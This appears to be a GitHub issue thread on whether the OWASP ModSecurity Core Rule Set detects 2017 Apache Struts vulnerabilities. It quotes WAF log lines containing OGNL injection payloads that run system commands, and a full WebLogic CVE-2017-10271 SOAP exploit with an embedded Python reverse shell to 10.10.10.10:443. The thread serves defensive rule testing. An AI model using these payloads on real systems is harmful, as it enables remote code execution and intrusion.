Owasp-modsecurity-crs: Coverage of Java Struts Vulnerabilities in 944

Created on 2 Apr 2018  路  5Comments  路  Source: SpiderLabs/owasp-modsecurity-crs

  • CVE-2017-5638: Mishandles file upload, allowing remote attackers to ...
  • CVE-2017-7672: Prepares a special URL that is used to overload ...
  • CVE-2017-9787: Makes it possible to perform a denial-of-service attack.
  • CVE-2017-9791: Allows remote code execution.
  • CVE-2017-9793: Allows an unauthenticated, remote attacker to cause a DoS
  • CVE-2017-9804: Allows an unauthenticated, remote attacker to cause a DoS
  • CVE-2017-9805: Allows remote attackers to execute arbitrary code.
  • CVE-2017-12611: Using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack
  • CVE-2017-15707: The REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload.

Most helpful comment

I had time this week to study this issue.
I was looking for exploits to test these Apache Struts vulnerabilities (2017 only).
Not every vulnerability has an exploit.
But what I can say is that any vulnerability that has a published exploit is detected by CRS.
That is good news!

id "913100": "Matched Data: struts-pwn found within REQUEST_HEADERS: User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn)"

id "944130": "Matched Data: %{#context['com.opensymphony.xwork2.dispatcher.httservletresponse'].addheader('...')} found within REQUEST_HEADERS: Content-Type"
id "944100": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."

id "944110": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#isw..."
id "944130": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."
id "920370": "Operator GT matched 400 at ARGS:name"

id "933160": "Matched Data: exec('cat /etc/bla')) found within ARGS:name: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))}"

id "944100": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"

id "944100": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."

id "944110": "Matched Data: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))} found within ARGS:name

id "944110": "Matched Data: age=20&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAcce..."

id "944130": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"

id "944130": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."
id "932160": "Matched Data: bin/sh found within XML: 0 false 0/bin/sh-ccat/etc/foo false java.lang.processbuilder start foo foo false 0 0 false false 0 "

id "944100": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."

id "944100": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"

id "944110": "Matched Data: com.sun.xml.internal.bind.v2.runtime.unmsarshaller.Base64Data found within XML"

id "944110": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."

id "944110": "Matched Data: java.util.Collections$EmptyIterator found within XML"

id "944110": "Matched Data: java.lang.ProcessBuilder$NullInputStream found within XML"

id "944130": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..." found within XML"

id "944130": "Matched Data: java.lang.processbuilder found within XML"

id "944130": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"
  • CVE-2017-12611: No exploit found
  • CVE-2017-15707: No exploit found

Maybe we could now add these CVE numbers to the comment of the triggered rules?

All 5 comments

Hi @franbuehler, I'm pretty busy for the moment but if I have some time to spare I would like to test at least some of the most common exploits available, like those from exploitdb, not all of them apply but certainly many will fit into the category and should be mitigated by 944 or some other CRS rules (e.g. RCE).

I had time this week to study this issue.
I was looking for exploits to test these Apache Struts vulnerabilities (2017 only).
Not every vulnerability has an exploit.
But what I can say is that any vulnerability that has a published exploit is detected by CRS.
That is good news!

id "913100": "Matched Data: struts-pwn found within REQUEST_HEADERS: User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn)"

id "944130": "Matched Data: %{#context['com.opensymphony.xwork2.dispatcher.httservletresponse'].addheader('...')} found within REQUEST_HEADERS: Content-Type"
id "944100": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."

id "944110": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#isw..."
id "944130": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."
id "920370": "Operator GT matched 400 at ARGS:name"

id "933160": "Matched Data: exec('cat /etc/bla')) found within ARGS:name: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))}"

id "944100": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"

id "944100": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."

id "944110": "Matched Data: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))} found within ARGS:name

id "944110": "Matched Data: age=20&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAcce..."

id "944130": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"

id "944130": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."
id "932160": "Matched Data: bin/sh found within XML: 0 false 0/bin/sh-ccat/etc/foo false java.lang.processbuilder start foo foo false 0 0 false false 0 "

id "944100": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."

id "944100": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"

id "944110": "Matched Data: com.sun.xml.internal.bind.v2.runtime.unmsarshaller.Base64Data found within XML"

id "944110": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."

id "944110": "Matched Data: java.util.Collections$EmptyIterator found within XML"

id "944110": "Matched Data: java.lang.ProcessBuilder$NullInputStream found within XML"

id "944130": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..." found within XML"

id "944130": "Matched Data: java.lang.processbuilder found within XML"

id "944130": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"
  • CVE-2017-12611: No exploit found
  • CVE-2017-15707: No exploit found

Maybe we could now add these CVE numbers to the comment of the triggered rules?

Another test:
Oracle Weblogic vulnerability CVE-2017-10271 tested with https://www.exploit-db.com/exploits/43458/

Triggers:
id "932105": msg "Remote Command Execution: Unix Command Injection"
id "932115": msg "Remote Command Execution: Windows Command Injection"
id "932150": msg "Remote Command Execution: Direct Unix Command Execution"
id "932160": msg "Remote Command Execution: Unix Shell Code Found"
id "944100": msg "Remote Command Execution: Suspicious Java class detected"
id "944110": msg "Remote Command Execution: Java process spawn (CVE-2017-9805)" - triggers twice
id "944130": msg "Suspicious Java class detected" - triggers twice

Payload:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3" >
            <void index="0">
              <string>/bin/sh</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.du
p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

Could you include the new payload in your comment, please?

Solved in PR #1256.

Was this page helpful?
0 / 5 - 0 ratings

Related issues

lifeforms picture lifeforms  路  6Comments

skidoosh picture skidoosh  路  3Comments

ygrek picture ygrek  路  7Comments

mnot picture mnot  路  8Comments

dune73 picture dune73  路  6Comments